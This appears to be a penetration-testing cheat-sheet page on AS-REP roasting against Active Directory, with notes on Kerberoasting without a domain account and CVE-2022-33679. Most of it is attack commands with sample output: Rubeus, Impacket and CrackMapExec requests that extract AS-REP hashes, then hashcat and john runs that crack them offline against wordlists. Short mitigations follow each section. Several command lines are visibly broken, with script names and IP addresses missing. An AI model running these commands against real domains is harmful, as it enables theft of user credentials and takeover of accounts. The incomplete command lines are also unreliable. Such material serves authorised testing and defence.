PenTest – Roasting – ASREP Roasting

If a domain user does not have Kerberos preauthentication enabled, an AS-REP can be successfully requested for the user, and a component of the structure can be cracked offline a la kerberoasting

Requirements: – Accounts with the attribute DONT_REQ_PREAUTH (PowerView > Get-DomainUser -PreauthNotRequired -Properties distinguishedname -Verbose)

  • Rubeus
    C:\Rubeus>Rubeus.exe asreproast /user:TestOU3user /format:hashcat /outfile:hashes.asreproast
    [*] Action: AS-REP roasting
    [*] Target User            : TestOU3user
    [*] Target Domain          : testlab.local
    [*] SamAccountName         : TestOU3user
    [*] DistinguishedName      : CN=TestOU3user,OU=TestOU3,OU=TestOU2,OU=TestOU1,DC=testlab,DC=local
    [*] Using domain controller: testlab.local (
    [*] Building AS-REQ (w/o preauth) for: 'testlab.local\TestOU3user'
    [*] Connecting to
    [*] Sent 169 bytes
    [*] Received 1437 bytes
    [+] AS-REQ w/o preauth successful!
    [*] AS-REP hash:


  • GetNPUsers from Impacket Suite
    $ python htb.local/svc-alfresco -no-pass
    [*] Getting TGT for svc-alfresco
    # extract hashes
    root@kali:impacket-examples$ python jurassic.park/ -usersfile usernames.txt -format hashcat -outputfile hashes.asreproast
    root@kali:impacket-examples$ python jurassic.park/triceratops:Sh4rpH0rns -request -format hashcat -outputfile hashes.asreproast


  • CrackMapExec Module
    $ crackmapexec ldap -u 'username' -p 'password' --kdcHost --asreproast output.txt
    LDAP       389    dc01           $krb5asrep$23$john.doe@LAB.LOCAL:5d1f750[...]2a6270d7$096fc87726c64e545acd4687faf780[...]13ea567d5


Using hashcat or john to crack the ticket.

# crack AS_REP messages with hashcat
root@kali:impacket-examples$ hashcat -m 18200 --force -a 0 hashes.asreproast passwords_kerb.txt 
root@windows:hashcat$ hashcat64.exe -m 18200 '<AS_REP-hash>' -a 0 c:\wordlists\rockyou.txt

# crack AS_REP messages with john
C:\Rubeus> john --format=krb5asrep --wordlist=passwords_kerb.txt hashes.asreproast

Mitigations: * All accounts must have « Kerberos Pre-Authentication » enabled (Enabled by Default).

Kerberoasting w/o domain account

In September 2022 a vulnerability was discovered by Charlie Clark, ST (Service Tickets) can be obtained through KRB_AS_REQ request without having to control any Active Directory account. If a principal can authenticate without pre-authentication (like AS-REP Roasting attack), it is possible to use it to launch an KRB_AS_REQ request and trick the request to ask for a ST instead of a encrypted TGT, by modifying the sname attribute in the req-body part of the request.

The technique is fully explained in this article: Semperis blog post.

⚠ You must provide a list of users because we don’t have a valid account to query the LDAP using this technique.


CVE-2022-33679 performs an encryption downgrade attack by forcing the KDC to use the RC4-MD4 algorithm and then brute forcing the session key from the AS-REP using a known plaintext attack, Similar to AS-REP Roasting, it works against accounts that have pre-authentication disabled and the attack is unauthenticated meaning we don’t need a client’s password..

Research from Project Zero :

Requirements: – Accounts with the attribute DONT_REQ_PREAUTH (PowerView > Get-DomainUser -PreauthNotRequired -Properties distinguishedname -Verbose)

  • using
    user@hostname:~$ python DOMAIN.LOCAL/User DC01.DOMAIN.LOCAL
    user@hostname:~$ export KRB5CCNAME=/home/project/User.ccache
    user@hostname:~$ crackmapexec smb DC01.DOMAIN.LOCAL -k --shares

Mitigations: * All accounts must have « Kerberos Pre-Authentication » enabled (Enabled by Default). * Disable RC4 cipher if possible.


Add a Comment

Votre adresse e-mail ne sera pas publiée. Les champs obligatoires sont indiqués avec *